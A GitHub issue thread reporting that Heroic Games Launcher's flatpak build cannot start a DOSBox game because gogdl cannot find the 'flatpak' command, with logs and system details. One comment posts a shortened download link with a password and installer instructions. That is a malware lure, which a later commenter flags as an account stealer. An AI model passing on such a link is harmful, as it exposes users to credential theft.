### ISSUE TITLE
Unable to start DOSBox game using native runner

### ISSUE THREAD

**Issue by feugatos** [Heroic-Games-Launcher/HeroicGamesLauncher#3983]
### Describe the bug

Hi,

I have installed Heroic v2.15.1 with gogdl v1.1.1, as a flatpak. Additionally, DOSBox-Staging v0.81.1 flatpak  is installed.

The `org.freedesktop.Flatpak` talk permission in Session Bus (as instructed in https://github.com/Heroic-Games-Launcher/HeroicGamesLauncher/wiki/How-To:-DOSBOX-and-SCUMMVM) has been added to Heroic using Flatseal
![image](https://github.com/user-attachments/assets/293f39c7-b563-43e6-a2bd-6a3eb34f2c93)

When trying to launch a DOSBox game (e.g. Jazz Jackrabbit Collection) the following error can be found in the logs:
```
Traceback (most recent call last):
  File "gogdl/cli.py", line 67, in <module>
  File "gogdl/cli.py", line 62, in main
  File "gogdl/launch.py", line 92, in launch
  File "gogdl/launch.py", line 27, in get_flatpak_command
  File "subprocess.py", line 505, in run
  File "subprocess.py", line 951, in __init__
  File "subprocess.py", line 1837, in _execute_child
FileNotFoundError: [Errno 2] No such file or directory: 'flatpak'
```

It appears that either Heroic or gogdl is trying to launch the game using DOSBox-Stating flatpak, using `flatpak run`. Shouldn't this be `flatpak-spawn --host` instead?

### Add logs

```text
Launching "Jazz Jackrabbit Collection" (gog)
Native? No
Installed in: /games/Heroic/Jazz Jackrabbit

System Info:
CPU: 12x Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz
Memory: 33.43 GB (used: 3.84 GB)
GPUs:
  GPU 0:
    Name: Advanced Micro Devices, Inc. [AMD/ATI] NITRO+ RX 7900 XTX Vapor-X
    IDs: D=744c V=1002 SD=e471 SV=1da2
    Driver: amdgpu
OS: openSUSE Tumbleweed 6.10.5-1-default (linux)

The current system is not a Steam Deck
We are running inside a Flatpak container

Software Versions:
  Heroic: 2.15.1 Emeth
  Legendary: 0.20.35 Lowlife (Heroic)
  gogdl: 1.1.1
  comet: comet 0.1.2

  Nile: 1.1.1 Will A. Zeppeli

Game Settings: {
	"autoInstallDxvk": true,
	"autoInstallDxvkNvapi": false,
	"autoInstallVkd3d": true,
	"preferSystemLibs": false,
	"enableEsync": true,
	"enableMsync": false,
	"enableFsync": true,
	"nvidiaPrime": false,
	"enviromentOptions": [],
	"wrapperOptions": [],
	"showFps": false,
	"showMangohud": true,
	"useGameMode": true,
	"battlEyeRuntime": true,
	"eacRuntime": true,
	"language": "",
	"beforeLaunchScriptPath": "",
	"afterLaunchScriptPath": "",
	"wineVersion": {
		"bin": "/home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/wine/Wine-GE-Proton8-26/bin/wine",
		"name": "Wine - Wine-GE-Proton8-26",
		"type": "wine",
		"lib": "/home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/wine/Wine-GE-Proton8-26/lib64",
		"lib32": "/home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/wine/Wine-GE-Proton8-26/lib",
		"wineserver": "/home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/wine/Wine-GE-Proton8-26/bin/wineserver"
	},
	"winePrefix": "/games/Heroic/Prefixes/Jazz Jackrabbit Collection",
	"wineCrossoverBottle": ""
}

Game launched at: Tue Aug 27 2024 19:18:48 GMT+0300 (Eastern European Summer Time)

Winetricks packages: 

Launch Command: LD_LIBRARY_PATH=/home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/wine/Wine-GE-Proton8-26/lib64:/home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/wine/Wine-GE-Proton8-26/lib:/usr/lib/extensions/vulkan/gamescope/lib HEROIC_APP_NAME=1808582759 HEROIC_APP_RUNNER=gog GAMEID=umu-0 HEROIC_APP_SOURCE=gog STORE=gog STEAM_COMPAT_INSTALL_PATH="/games/Heroic/Jazz Jackrabbit" LD_PRELOAD= WINEPREFIX="/games/Heroic/Prefixes/Jazz Jackrabbit Collection" WINEDLLOVERRIDES=winemenubuilder.exe=d WINE_FULLSCREEN_FSR=0 WINEESYNC=1 WINEFSYNC=1 PROTON_EAC_RUNTIME=/home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/runtimes/eac_runtime PROTON_BATTLEYE_RUNTIME=/home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/runtimes/battleye_runtime ORIG_LD_LIBRARY_PATH=/usr/lib/extensions/vulkan/gamescope/lib GST_PLUGIN_SYSTEM_PATH_1_0=/home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/wine/Wine-GE-Proton8-26/lib64/gstreamer-1.0:/home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/wine/Wine-GE-Proton8-26/lib/gstreamer-1.0 WINEDLLPATH=/home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/wine/Wine-GE-Proton8-26/lib64/wine:/home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/wine/Wine-GE-Proton8-26/lib/wine /app/bin/heroic/resources/app.asar.unpacked/build/bin/x64/linux/gogdl launch "/games/Heroic/Jazz Jackrabbit" 1808582759 --wine /home/__/.var/app/com.heroicgameslauncher.hgl/config/heroic/tools/wine/Wine-GE-Proton8-26/bin/wine --wrapper "/usr/lib/extensions/vulkan/MangoHud/bin/mangohud --dlsym /app/bin/gamemoderun" --platform windows

Game Log:
Traceback (most recent call last):
  File "gogdl/cli.py", line 67, in <module>
  File "gogdl/cli.py", line 62, in main
  File "gogdl/launch.py", line 92, in launch
  File "gogdl/launch.py", line 27, in get_flatpak_command
  File "subprocess.py", line 505, in run
  File "subprocess.py", line 951, in __init__
  File "subprocess.py", line 1837, in _execute_child
FileNotFoundError: [Errno 2] No such file or directory: 'flatpak'
[2558] Failed to execute script 'cli' due to unhandled exception!
============= End of log =============
```

### Steps to reproduce

1. Install Heroic flatpak
2. Install DOSBOX-Staging flatpak
3. Add `org.freedesktop.Flatpak` Session Bus talk permission to Heroic using Flatseal
4. Install Windows version of a DOSBox game from gog.com
5. Try to launch the previously installed game
6. Observe the error

### Expected behavior

The game should launch using native flatpak of DOSBox-Staging.

### Heroic Version

Latest Stable (Flatpak)

### System Information

CPU: 12x Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz
Memory: 33.43 GB (used: 3.84 GB)
GPUs:
- GPU 0:
  - Name: Advanced Micro Devices, Inc. [AMD/ATI] NITRO+ RX 7900 XTX Vapor-X
  - IDs: D=744c V=1002 SD=e471 SV=1da2
  - Driver: amdgpu
OS: openSUSE Tumbleweed 6.10.5-1-default (linux)

The current system is not a Steam Deck
We are running inside a Flatpak container

Software Versions:
- Heroic: 2.15.1 Emeth
- Legendary: 0.20.35 Lowlife (Heroic)
- gogdl: 1.1.1
- comet: comet 0.1.2
- Nile: 1.1.1 Will A. Zeppeli

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by feugatos** [comment]
@caineblood Don't worry. I have already reported the user to Github. Thanks.

**Comment by feugatos** [comment]
Please note that the AppImage version of Heroic does not have this issue.
